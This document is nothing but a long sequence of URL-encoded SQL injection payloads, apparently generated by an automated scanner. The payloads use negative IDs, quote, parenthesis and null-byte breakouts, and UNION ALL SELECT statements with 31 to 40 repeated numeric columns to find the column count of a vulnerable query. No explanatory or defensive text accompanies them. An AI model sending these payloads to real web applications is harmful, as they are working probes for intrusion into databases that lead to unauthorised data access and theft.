-6729%22%20UNION%20ALL%20SELECT%208001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%2C8001%23 -6203%22%20UNION%20ALL%20SELECT%203865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%2C3865%23 -2826%22%20UNION%20ALL%20SELECT%205094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%23 -9879%22%20UNION%20ALL%20SELECT%204353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%2C4353%23 -8431%25%27%29%20UNION%20ALL%20SELECT%205273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%2C5273%23 -6048%25%27%29%20UNION%20ALL%20SELECT%209284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%2C9284%23 -5418%25%27%29%20UNION%20ALL%20SELECT%207772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%23 -6822%25%27%29%20UNION%20ALL%20SELECT%205320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%2C5320%23 -3722%25%27%29%20UNION%20ALL%20SELECT%209809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%2C9809%23 -3286%25%27%29%20UNION%20ALL%20SELECT%204824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%2C4824%23 -8464%25%27%29%20UNION%20ALL%20SELECT%204657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%2C4657%23 -6274%25%27%29%20UNION%20ALL%20SELECT%208898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%2C8898%23 -1937%25%27%29%20UNION%20ALL%20SELECT%201171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%23 -9463%25%27%29%20UNION%20ALL%20SELECT%209749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%2C9749%23 -9625%25%27%29%29%20UNION%20ALL%20SELECT%204909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%2C4909%23 -8572%25%27%29%29%20UNION%20ALL%20SELECT%209850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%2C9850%23 -8109%25%27%29%29%20UNION%20ALL%20SELECT%206675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%2C6675%23 -2172%25%27%29%29%20UNION%20ALL%20SELECT%209855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%2C9855%23 -3631%25%27%29%29%20UNION%20ALL%20SELECT%203034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%2C3034%23 -4262%25%27%29%29%20UNION%20ALL%20SELECT%209819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%2C9819%23 -8059%25%27%29%29%20UNION%20ALL%20SELECT%205466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%23 -6717%25%27%29%29%20UNION%20ALL%20SELECT%206635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%23 -6007%25%27%29%29%20UNION%20ALL%20SELECT%203583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%2C3583%23 -1992%25%27%29%29%20UNION%20ALL%20SELECT%204643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%2C4643%23 -8183%25%27%29%29%29%20UNION%20ALL%20SELECT%204467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%2C4467%23 -1779%25%27%29%29%29%20UNION%20ALL%20SELECT%208018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%2C8018%23 -2361%25%27%29%29%29%20UNION%20ALL%20SELECT%201373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%23 -5733%25%27%29%29%29%20UNION%20ALL%20SELECT%204847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%2C4847%23 -6894%25%27%29%29%29%20UNION%20ALL%20SELECT%209635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%2C9635%23 -5151%25%27%29%29%29%20UNION%20ALL%20SELECT%206374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%2C6374%23 -9868%25%27%29%29%29%20UNION%20ALL%20SELECT%204128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%2C4128%23 -7712%25%27%29%29%29%20UNION%20ALL%20SELECT%203996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%2C3996%23 -3693%25%27%29%29%29%20UNION%20ALL%20SELECT%209260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%2C9260%23 -8681%25%27%29%29%29%20UNION%20ALL%20SELECT%203831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%2C3831%23 -3566%25%27%20UNION%20ALL%20SELECT%209949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%2C9949%23 -4397%25%27%20UNION%20ALL%20SELECT%201639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%2C1639%23 -5212%25%27%20UNION%20ALL%20SELECT%205182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%23 -9025%25%27%20UNION%20ALL%20SELECT%202959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%23 -6505%25%27%20UNION%20ALL%20SELECT%206544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%2C6544%23 -1577%25%27%20UNION%20ALL%20SELECT%206272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%2C6272%23 -5795%25%27%20UNION%20ALL%20SELECT%205893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%23 -7679%25%27%20UNION%20ALL%20SELECT%203499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%2C3499%23 -1664%25%27%20UNION%20ALL%20SELECT%203249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%2C3249%23 -7023%25%27%20UNION%20ALL%20SELECT%204845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%2C4845%23 -6742%00%27%29%20UNION%20ALL%20SELECT%209799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%2C9799%23 -7581%00%27%29%20UNION%20ALL%20SELECT%203094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%2C3094%23 -5949%00%27%29%20UNION%20ALL%20SELECT%207756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%2C7756%23 -8894%00%27%29%20UNION%20ALL%20SELECT%203551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%2C3551%23 -2428%00%27%29%20UNION%20ALL%20SELECT%206271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%2C6271%23 -9130%00%27%29%20UNION%20ALL%20SELECT%209903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%23 -6153%00%27%29%20UNION%20ALL%20SELECT%203201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%2C3201%23 -6822%00%27%29%20UNION%20ALL%20SELECT%207280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%23 -2977%00%27%29%20UNION%20ALL%20SELECT%201505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%2C1505%23 -9748%00%27%29%20UNION%20ALL%20SELECT%202493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%2C2493%23 -9050%00%27%20UNION%20ALL%20SELECT%208938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%2C8938%23 -8882%00%27%20UNION%20ALL%20SELECT%203840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%2C3840%23 -2272%00%27%20UNION%20ALL%20SELECT%207593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%2C7593%23 -9401%00%27%20UNION%20ALL%20SELECT%207099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%2C7099%23 -7033%00%27%20UNION%20ALL%20SELECT%202498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%2C2498%23 -3563%00%27%20UNION%20ALL%20SELECT%207834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%2C7834%23 -4861%00%27%20UNION%20ALL%20SELECT%206435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%2C6435%23 -1805%00%27%20UNION%20ALL%20SELECT%202814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%2C2814%23 -8708%00%27%20UNION%20ALL%20SELECT%206190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%2C6190%23 -8465%00%27%20UNION%20ALL%20SELECT%205993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%2C5993%23 -3716%27%29%20WHERE%208649%3D8649%20UNION%20ALL%20SELECT%208649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%2C8649%23 -3819%27%29%20WHERE%209248%3D9248%20UNION%20ALL%20SELECT%209248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%2C9248%23 -2849%27%29%20WHERE%206143%3D6143%20UNION%20ALL%20SELECT%206143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%2C6143%23 -5732%27%29%20WHERE%201858%3D1858%20UNION%20ALL%20SELECT%201858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%2C1858%23 -9598%27%29%20WHERE%201319%3D1319%20UNION%20ALL%20SELECT%201319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%23 -5491%27%29%20WHERE%205296%3D5296%20UNION%20ALL%20SELECT%205296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%2C5296%23 -3361%27%29%20WHERE%205512%3D5512%20UNION%20ALL%20SELECT%205512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%23 -2142%27%29%20WHERE%203681%3D3681%20UNION%20ALL%20SELECT%203681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%2C3681%23 